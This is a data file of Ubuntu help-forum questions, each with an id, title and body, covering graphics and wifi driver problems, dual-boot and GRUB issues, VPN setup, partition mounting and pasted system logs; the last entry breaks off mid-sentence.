411697	ubuntu 13.10 , amd sapphire 7790 hd compatability issues	i am currently using a gigabyte m7 board , with 6 gbs of ram , and the gpu i was attempting to use was a hd sapphire 7790 from amd . when i boot the computer , it tells me , it must be set at low graphics mode , and then bricks . i am forced to reboot and nothing changes , i have replaced it with an nvidia geforce 8400 gs , and it is now working . but i would like to know the status of a 7790 compatible driver for ubuntu 13.10 . or if there is a terminal command i may use to gain access to it , considering it 's obvious superiority to the 8400 gs . thanks all ^^
411698	how do i tell the kernel which driver to use ?	my wifi is behaving strangely ( not scanning , not connecting to networks ) to remedy this i 'm trying to install drivers from intel . the device is an intel centrino advanced-n 6205 . the documentation was n't very clear on how to install it . i downloaded the iwlwifi-6000g2a-6.ucode file from this intel page , and copied that ucode file to /lib/firmware directory . that 's all the documentation that came with the file told me to do . the information on this page is pretty much the same info i got with the ucode file from intel . there 's some stuff about a firmware loader and kernel config file that i do n't understand . when i run $ sudo lshw -c network i find the following : *-network description : wireless interface product : centrino advanced-n 6205 [ taylor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : a0:88 : b4:30:4b:08 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-35-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:43 memory : c0500000-c0501fff it looks to me that driverversion=3.8.0-35-generic means the kernel is using some generic intel driver and not the one i just downloaded from intel . am i correct ? and if so , how to i get the kernel to start using the new driver ?
411700	how to burn a .dmg file to a dvd/cd ?	i have downloaded mac.osx.mountain.lion.v10.8.3 and i have never burned a dmg file . how to burn this operating system in a dvd ?
411702	ubuntu 12.04 keyring broken `` signature not found in user keyring perhaps try the	so , for some reason i cant suddenly log into my main account , so i did alt+ctrl+f1 and saw the message `` signature not found in user keyring perhaps try the interactive 'ecryptfs-mount-private ' '' i can log into another account such as root without any issue how would i fix this issue ?
411705	boot problem 12.04 on thinkpad with uefi	i 'm a new user and just installed ubuntu 12.04 lts on a thinkpad with an nvidia graphicscard . i created 5 partitions on my hdd : /boot/efi /boot / /swap /home the live version runs nicely . i allready ran the boot repair too here 's the url : ubuntu pastebin . when i try to boot the laptop after running the bios it shortly shows e fdisk read error , then trying to run ubuntu but stops before getting to the login screen - either with showing the purple screen with ubuntu logo and loading dots - or it becomes black . i also tried to change the grub during boot from quietsplash to nomodeset , no success .
411710	enable mschap and mppe for vpn connection	i have setup a vpn configuration file , the connection is responding but in order to actually connect to it i need to enable mschap , mschapv2 and mppe , just like the picture here : the problem arises when i need to do this from the terminal since i only have ssh access . i added this to my /etc/ppp/options.pptp : refuse-pap refuse-eap refuse-chap # refuse-mschap require-mppe-128 when i try to dial the connection pon myvpn nodetach i get this response : using interface ppp0 connect : ppp0 < -- > /dev/pts/1 mppe required , but ms-chap [ v2 ] auth not performed . connection terminated . any hint how to set this from terminal ?
411716	skype 4.2.0.11 keeps restarting after quit	skype on ubuntu 12.04 keeps on starting up after i shut it off . if i 'm not going to touch skype after reboot it will not bother me , but just one start is enough to begin with never-ending loop of skype login windows . skype itself appear to work without any problems . i installed skype by following these lines in terminal : sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' sudo apt-get update sudo apt-get install skype & & sudo apt-get -f install i reinstalled it trough the terminal as well thinking it would help solving the problem , but it did n't . i would love to restore total control over this application .
411718	wifi shows connected but i cant navigate on ubuntu 12.04	i 've installed ubuntu 12.04 ( making a dual boot with xp colossus edition ) . i 've got an encore wirless n150 mini adapter http : //www.encore-usa.com/ar/support/enuwi-1xn4m my problem is that ubuntu shows the wifi network is conected but if i try navigate on fairefox i ca n't ( while windows shows no problem at all ) this is the first time i 've evere used any linux distro so im kind of lost and dont really know what to do .
411720	need help to solve shutdown issue in ubuntu 13.10 with dual boot	i want to have dual boot in my laptop but i face some improper shut down . here is what all i did . day 1 : installed ubuntu 13.10 everything worked like charm except display 's brightness . fixed display with help of google and brightness can now be adjusted accordingly . shutdown was working fine at present . day 2 : installed windows 7 in dual boot but mistakenly after installing only windows 7 will boot up . tried everything and then deleted the drive containing ubuntu . day 3 : installed windows 7 on 60 gib . made a 150 gib partition for ubuntu and remaining for storing data . installed ubuntu 13.10 on 150 gib with 1gib swap . had to create it as logical in order to have swap area . but on restart it gave me windows again . but this time i used easy bcd to make an entry for ubuntu . everything is okay now and it has dual boot but when i select ubuntu it again asks whether to go for ubuntu or windows 7 . i do n't want this option to come . secondly screen is now again not getting dim and battery backup is just 3 hours . also when i give shut down command the laptop freezes after some dots . if i poweroff using terminal then too i will get some code and it wo n't go ... i mean it again hangs ...
411724	wireless stops immediately after i log in ubuntu 12.04 lts on lenovo ideapad z710	wireless stops immediately after i log in ubuntu 12.04 lts on lenovo ideapad z710 . i need a little help . thank you in advance . nm-tool gives me state : disconnected
411729	disable grub bootloader 's grub_timeout=-1 after failed startup ?	my title may be incorrect , but i hope i get the idea across ... you know , when you have a failed startup and grub decides next time it starts up it 'll disable the countdown and give you indefinite time to choose your os ? i dont want that . i have a computer that needs to run 24/7 , and has a failsafe that 'll restart the computer under some circumstances . this weekend , while i was out of town , i had the computer restart twice -- interrupting the first boot ! this disabled the countdown , so the computer sat there in the grub screen all weekend- which was n't good , for me .
411732	can not access partition after mounting	after i managed to mount one of my windows partitions i worked with it for some time without any problems . after restart i ca n't access any more the partition , meaning the folder i mounted it on , still exists ( obvious ) , but when i enter it , it is clean , meaning it has no data inside . when i try to mount again my partition i get the following message : mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . how to fix the problem ? edits : to mount my partition i used the command line : sudo mkdir hard sudo mount /dev/sda5/ /media/alexandru/hard/
411738	add logout button to lockscreen in 12.04	how can i add the `` log out '' button ( that lets users log out other users after a certain timeout ) to the lock-screen in ubuntu 12.04 ? i know it was possible in 10.04 , but i ca n't seem to find the setting in 12.04 . or , is there any other way to let users log out other users in case the setting is gone ?
411745	installing ubuntu on ssd drive	i have been trying to figure this out for a couple days . i want to dual boot ubuntu and windows . i have windows on a ssd that i left 30gb unallocated space for ubuntu , also have 3 1tb hdd set up as a raid 5 , this is all fresh installed on a new machine . my problem is ubuntu wants to install on one of the hdd in the raid and not the partition on the ssd . i even unplugged all the raid 5 hhds and then the installer does n't see windows . what do i need to do to get this to work ? i do know that the ssd is set to ide in the bios , that was the only way i could get windows on it with the dvd rom i have . and ubuntu does n't see the raid it just shows individual hdd . specs : windows 64bit gigabyte ga-990fxa-ud3 amd fx-3250 legacy raid
411747	error installing rails 3.2.14	i get the following error while installing rails 3.2.14 : with sudo apt-get install rails apt 0.8.16~exp12ubuntu10.16 for amd64 compiled on nov 15 2013 15:33:57 supported modules : *ver : standard .deb *pkg : debian dpkg interface ( priority 30 ) pkg : debian apt solver interface ( priority -1000 ) s.l : 'deb ' standard debian binary tree s.l : 'deb-src ' standard debian source tree idx : debian source index idx : debian package index idx : debian translation index idx : debian dpkg status file idx : edsp scenario file when i try to install rails with gem install rails it show the following error . error : while executing gem ... ( nomethoderror ) undefined method `ord ' for nil : nilclass
411748	software updater ignores request to update	i have updated to ubuntu 12.10 . daily i receive notice from the software updater that files are available for updating . when i click on the `` install now '' button , the clock icon briefly shows , then nothing happens . the next day i get the same notice showing the same size of download available . after a couple weeks of this the notice changed to showing twice the size of download available . this seems to confirm my doubts that no updates are ever installed , they merely accumulate . how do i get the software update function to perform ?
411751	acer aspire-r7 wifi	will ubuntu ever support the acer aspire-r7 ? it uses a custom broadcom chipset . i even tried using an external usb 'engenius wireless n ' , but the driver crashes . i give up at this point . i do n't have an ethernet port and do n't want to switch to another linux distribution . does the beta support this chipset or is ubuntu and acer r7 a deadend ?
411753	wireless card tries to connect , but connection fails . used to work	i used to be able to use my ubuntu desktop to connect to my wireless ap . then i moved across country and when i finally received my box , the system would no longer connect to the ap . i have other devices attached to that ap , so i know it works . i have tried to authenticate to a different ap , but that fails . i have taken the wireless nic card and put it in my laptop , the nic worked . the device is able to detect the nic is there , and uses it to try to authenticate to the network . i 've watched the logs , and when i enter a new ap this is what i see . logs from what i 've seen below . my ap is a netgear and my nic is a edimax . i 've run out of ideas , any suggestions of what else i could try . lestat @ france : /var/log $ tail -f auth.log syslog == > auth.log < == jan 27 13:17:08 france sudo : lestat : tty=pts/0 ; pwd=/etc/networkmanager/system-onnections ; user=root ; command=/usr/bin/less fritz ! box 7330 jan 27 13:17:08 france sudo : pam_unix ( sudo : session ) : session opened for user root by estat ( uid=1000 ) jan 27 13:17:38 france sudo : pam_unix ( sudo : session ) : session closed for user root jan 27 13:27:04 france polkitd ( authority=local ) : unregistered authentication agent for nix-session : /org/freedesktop/consolekit/session1 ( system bus name :1.32 , object path /org/gnome/policykit1/authenticationagent , locale en_us.utf-8 ) ( disconnected from bus ) jan 27 13:27:37 france lightdm : pam_unix ( lightdm-autologin : session ) : session opened for user lestat by ( uid=0 ) jan 27 13:27:37 france lightdm : pam_ck_connector ( lightdm-autologin : session ) : nox11 mode , ignoring pam_tty :0 jan 27 13:27:38 france polkitd ( authority=local ) : registered authentication agent for unix-session : /org/freedesktop/consolekit/session1 ( system bus name :1.27 [ /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 ] , object path /org/gnome/policykit1/authenticationagent , locale en_us.utf-8 ) jan 27 13:27:41 france dbus [ 758 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.43 '' ( uid=1000 pid=1583 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.15 '' ( uid=0 pid=1171 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) jan 27 14:17:01 france cron [ 2021 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) jan 27 14:17:01 france cron [ 2021 ] : pam_unix ( cron : session ) : session closed for user root == > syslog < == jan 27 14:37:31 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jan 27 14:37:31 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jan 27 14:37:31 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jan 27 14:37:31 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jan 27 14:37:31 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jan 27 14:37:31 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jan 27 14:37:31 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jan 27 14:37:31 france networkmanager [ 796 ] : < info > activation ( wlan0/wireless ) : access point 'orleans2000 ' has security , but secrets are required . jan 27 14:37:31 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jan 27 14:37:31 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jan 27 14:38:17 france networkmanager [ 796 ] : get_secret_flags : assertion `is_secret_prop ( setting , secret_name , error ) ' failed jan 27 14:38:17 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jan 27 14:38:17 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jan 27 14:38:17 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] jan 27 14:38:17 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jan 27 14:38:17 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jan 27 14:38:17 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jan 27 14:38:17 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jan 27 14:38:17 france networkmanager [ 796 ] : < info > activation ( wlan0/wireless ) : connection 'orleans2000 ' has security , and secrets exist . no new secrets needed . jan 27 14:38:17 france networkmanager [ 796 ] : < info > config : added 'ssid ' value 'orleans2000' jan 27 14:38:17 france networkmanager [ 796 ] : < info > config : added 'scan_ssid ' value '1' jan 27 14:38:17 france networkmanager [ 796 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' jan 27 14:38:17 france networkmanager [ 796 ] : < info > config : added 'auth_alg ' value 'open' jan 27 14:38:17 france networkmanager [ 796 ] : < info > config : added 'psk ' value ' < omitted > ' jan 27 14:38:17 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jan 27 14:38:17 france networkmanager [ 796 ] : < info > config : set interface ap_scan to 1 jan 27 14:38:17 france networkmanager [ 796 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning jan 27 14:38:17 france wpa_supplicant [ 1024 ] : trying to authenticate with c4:3d : c7:64:0d:25 ( ssid='orleans2000 ' freq=2437 mhz ) jan 27 14:38:17 france networkmanager [ 796 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating jan 27 14:38:18 france kernel : [ 4259.084194 ] wlan0 : authenticate with c4:3d : c7:64:0d:25 ( try 1 ) jan 27 14:38:18 france wpa_supplicant [ 1024 ] : trying to associate with c4:3d : c7:64:0d:25 ( ssid='orleans2000 ' freq=2437 mhz ) jan 27 14:38:18 france kernel : [ 4259.086363 ] wlan0 : authenticated jan 27 14:38:18 france networkmanager [ 796 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating jan 27 14:38:18 france kernel : [ 4259.110689 ] wlan0 : associate with c4:3d : c7:64:0d:25 ( try 1 ) jan 27 14:38:18 france kernel : [ 4259.114336 ] wlan0 : rx assocresp from c4:3d : c7:64:0d:25 ( capab=0x411 status=0 aid=2 ) jan 27 14:38:18 france kernel : [ 4259.114340 ] wlan0 : associated jan 27 14:38:18 france wpa_supplicant [ 1024 ] : associated with c4:3d : c7:64:0d:25 jan 27 14:38:18 france kernel : [ 4259.127405 ] addrconf ( netdev_change ) : wlan0 : link becomes ready jan 27 14:38:18 france networkmanager [ 796 ] : < info > ( wlan0 ) : supplicant interface state : associating - > 4-way handshake jan 27 14:38:18 france wpa_supplicant [ 1024 ] : wpa : key negotiation completed with c4:3d : c7:64:0d:25 [ ptk=ccmp gtk=ccmp ] jan 27 14:38:18 france wpa_supplicant [ 1024 ] : ctrl-event-connected - connection to c4:3d : c7:64:0d:25 completed ( auth ) [ id=0 id_str= ] jan 27 14:38:18 france networkmanager [ 796 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed jan 27 14:38:18 france networkmanager [ 796 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'orleans2000 ' . jan 27 14:38:18 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . jan 27 14:38:18 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... jan 27 14:38:18 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] jan 27 14:38:18 france networkmanager [ 796 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) jan 27 14:38:18 france dhclient : internet systems consortium dhcp client 4.1-esv-r4 jan 27 14:38:18 france dhclient : copyright 2004-2011 internet systems consortium . jan 27 14:38:18 france dhclient : all rights reserved . jan 27 14:38:18 france dhclient : for info , please visit https : //www.isc.org/software/dhcp/ jan 27 14:38:18 france dhclient : jan 27 14:38:18 france networkmanager [ 796 ] : < info > dhclient started with pid 2145 jan 27 14:38:18 france networkmanager [ 796 ] : < info > activation ( wlan0 ) beginning ip6 addrconf . jan 27 14:38:18 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . jan 27 14:38:18 france networkmanager [ 796 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit jan 27 14:38:18 france dhclient : listening on lpf/wlan0/80:1f:02:34:32:33 jan 27 14:38:18 france dhclient : sending on lpf/wlan0/80:1f:02:34:32:33 jan 27 14:38:18 france dhclient : sending on socket/fallback jan 27 14:38:18 france dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 jan 27 14:38:21 france dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 7 jan 27 14:38:28 france kernel : [ 4269.502234 ] wlan0 : no ipv6 routers present jan 27 14:38:28 france dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 10 jan 27 14:38:38 france networkmanager [ 796 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . jan 27 14:38:38 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... jan 27 14:38:38 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... jan 27 14:38:38 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . jan 27 14:38:38 france dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 14 jan 27 14:38:52 france dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 14 jan 27 14:39:03 france networkmanager [ 796 ] : < warn > ( wlan0 ) : dhcpv4 request timed out . jan 27 14:39:03 france networkmanager [ 796 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 2145 jan 27 14:39:03 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... jan 27 14:39:03 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... jan 27 14:39:03 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] jan 27 14:39:03 france networkmanager [ 796 ] : < warn > activation ( wlan0 ) failed for access point ( orleans2000 ) jan 27 14:39:03 france networkmanager [ 796 ] : < warn > activation ( wlan0 ) failed . jan 27 14:39:03 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . jan 27 14:39:03 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jan 27 14:39:03 france networkmanager [ 796 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] jan 27 14:39:03 france kernel : [ 4304.436359 ] wlan0 : deauthenticating from c4:3d : c7:64:0d:25 by local choice ( reason=3 ) jan 27 14:39:03 france wpa_supplicant [ 1024 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 jan 27 14:39:03 france networkmanager [ 796 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected jan 27 14:39:03 france kernel : [ 4304.522687 ] cfg80211 : all devices are disconnected , going to restore regulatory settings jan 27 14:39:03 france kernel : [ 4304.522692 ] cfg80211 : restoring regulatory settings jan 27 14:39:03 france kernel : [ 4304.522696 ] cfg80211 : calling crda to update world regulatory domain jan 27 14:39:03 france kernel : [ 4304.525578 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain jan 27 14:39:03 france kernel : [ 4304.525581 ] cfg80211 : world regulatory domain updated : jan 27 14:39:03 france kernel : [ 4304.525583 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jan 27 14:39:03 france kernel : [ 4304.525585 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 27 14:39:03 france kernel : [ 4304.525587 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jan 27 14:39:03 france kernel : [ 4304.525588 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jan 27 14:39:03 france kernel : [ 4304.525590 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 27 14:39:03 france kernel : [ 4304.525592 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 27 14:39:06 france networkmanager [ 796 ] : < info > auto-activating connection 'orleans2000 ' . jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) starting connection 'orleans2000' jan 27 14:39:06 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jan 27 14:39:06 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0/wireless ) : access point 'orleans2000 ' has security , but secrets are required . jan 27 14:39:06 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jan 27 14:39:06 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jan 27 14:39:06 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0/wireless ) : connection 'orleans2000 ' has security , and secrets exist . no new secrets needed . jan 27 14:39:06 france networkmanager [ 796 ] : < info > config : added 'ssid ' value 'orleans2000' jan 27 14:39:06 france networkmanager [ 796 ] : < info > config : added 'scan_ssid ' value '1' jan 27 14:39:06 france networkmanager [ 796 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' jan 27 14:39:06 france networkmanager [ 796 ] : < info > config : added 'auth_alg ' value 'open' jan 27 14:39:06 france networkmanager [ 796 ] : < info > config : added 'psk ' value ' < omitted > ' jan 27 14:39:06 france networkmanager [ 796 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jan 27 14:39:06 france networkmanager [ 796 ] : < info > config : set interface ap_scan to 1 jan 27 14:39:06 france networkmanager [ 796 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning jan 27 14:40:06 france networkmanager [ 796 ] : < warn > activation ( wlan0/wireless ) : association took too long . jan 27 14:40:06 france networkmanager [ 796 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jan 27 14:40:06 france networkmanager [ 796 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets jan 27 14:40:06 france networkmanager [ 796 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . jan 27 14:40:06 france networkmanager [ 796 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . jan 27 14:40:09 france networkmanager [ 796 ] : < info > ( wlan0 ) : supplicant interface stat e : scanning - > inactive
411754	how to activate support for ansi escape in terminal ?	the ri tool of ruby for the documentation offers the possibility to output ansi escape sequences , but the terminal has to support it . how is it possible to activate support for ansi escape sequences in the gnome terminal of ubuntu ? in a way that the command $ ri symbol -- formant=ansi is correctly rendered .
411755	thinkpad s440 wifi and unexpected system halt	just a few days ago i installed new wifi driver and everything seemed to work fine on lenovo thinkpad s440 . but now i experience a problem with wifi : the speed slows down to zero that no page could load in web browser . the second problem ( not sure if they are connected but maybe ) is system crashes unexpectedly . this is a pastebin of dmesg output so you could see what 's happening . when the system crashes , x and all other programs crash . i ca n't even switch to tty and restart x . ca n't be reproduced . do n't know how to show you the output i see on the screen . update i used a kernel boot flag acpi_os=windows noapic on my ubuntu 12.04 on lenovo thinkpad s440 because i suppose that if they 've build it with windows8+ in mind , it could help somehow , but i 'm not sure . in this pastebin you can read all output from /var/log/syslog . update 2 wat is this ? i ran a memtest86 with several passes and it was fine , w/o errors , but : [ 0.000000 ] pm : registered nosave memory : 00000000be97f000 - 00000000c2e7f000 repeats few times in a row . [ 5.170944 ] amd iommuv2 driver by joerg roedel < joerg.roedel @ amd.com > [ 5.170948 ] amd iommuv2 functionality not available on this system [ 5.186546 ] acpi warning : 0x0000000000001828-0x000000000000182f systemio conflicts with region \pmio 1 ( 20121018/utaddress-251 ) [ 5.186556 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 5.186560 ] acpi warning : 0x0000000000000830-0x000000000000083f systemio conflicts with region \gprl 1 ( 20121018/utaddress-251 ) [ 5.186564 ] acpi warning : 0x0000000000000830-0x000000000000083f systemio conflicts with region \gpr_ 2 ( 20121018/utaddress-251 ) [ 5.186567 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 5.186568 ] acpi warning : 0x0000000000000800-0x000000000000082f systemio conflicts with region \gprl 1 ( 20121018/utaddress-251 ) [ 5.186571 ] acpi warning : 0x0000000000000800-0x000000000000082f systemio conflicts with region \gpr_ 2 ( 20121018/utaddress-251 ) [ 5.186574 ] acpi warning : 0x0000000000000800-0x000000000000082f systemio conflicts with region \io_d 3 ( 20121018/utaddress-251 ) [ 5.186577 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver what is drm ? [ 12.535066 ] [ drm ] gmbus [ i915 gmbus dpb ] timed out , falling back to bit banging on pin 5 [ 12.614067 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 13.805535 ] [ drm ] enabling rc6 states : rc6 on , rc6p off , rc6pp off [ 14.129091 ] [ drm : intel_dp_set_link_train ] *error* timed out waiting for dp idle patterns [ 14.129093 ] [ drm : i915_write32 ] *error* unknown unclaimed register before writing to 64040 this line can be result of acpi_os=windows noapic kernel boot parameter , i guess : [ 14.189856 ] [ firmware bug ] : acpi ( pegp ) defines _dod but not _dos [ 14.194131 ] acpi error : [ \_sb_.pci0.gfx0.dd02._bcl ] namespace lookup failure , ae_not_found ( 20121018/psargs-359 ) [ 14.194139 ] acpi error : method parse/execution failed [ \_sb_.pci0.rp05.pegp.dd02._bcl ] ( node ffff88012920ded8 ) , ae_not_found ( 20121018/psparse-537 ) [ 322.663766 ] [ drm : i915_write8 ] *error* unknown unclaimed register before writing to 3b4 [ 326.687401 ] [ drm : i915_write32 ] *error* unclaimed write to 70030 [ 326.689118 ] i915 0000:00:02.0 : more than 8 outputs detected [ 326.894826 ] usb 2-7 : reset full-speed usb device number 5 using xhci_hcd [ 326.904666 ] dpm_run_callback ( ) : pnp_bus_resume+0x0/0x70 returns -19 [ 326.904668 ] pm : device 00:06 failed to resume : error -19 [ 326.913169 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff880124c65000 [ 326.913171 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff880124c65040 [ 326.913172 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff880124c65080 [ 326.913173 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff880124c650c0 [ 328.005875 ] [ drm : intel_dp_set_link_train ] *error* timed out waiting for dp idle patterns [ 328.005879 ] [ drm : i915_write32 ] *error* unknown unclaimed register before writing to 64040 update 3 so , how can i manage the case ? here is the snapshot of what i see after the crash .
411756	radeon hd8570d , proprietary drivers not working !	hello and sorry for the many lines , but i will try to be as detailed as possible . i have an amd a8- 6600k with integrated graphics card , a radeon hd8570d and i am currently using ubuntu 13:10 ( saucy ) 64bit . i went in this distro because i thought in archlinux and in debian there was a compatibility issue with the driver , not having seen them mentioned on the website of amd , but apparently i was wrong : d i tried to install first open source drivers , but 3d acceleration is obviously bad because it does not ( currently ) support this type of vga , then i tried using the proprietary drivers , downloading them at first from software and updates and then manually downloading them from the amd website ( version 13:12 and then even beta [ 13:11 v9.95 ] ) and installing it by following the guidance of cchtml . the installation is successful , apparently , but trying to access the catalyst control center , i get a window saying my driver is n't working or it is n't configured yet . if i try to restart , after the ubuntu splash , x hangs on a black screen and gives me kernel panic ( keyboard leds flashing , no chance to do something with ctrl + alt + f1 / backspace or alt + up + 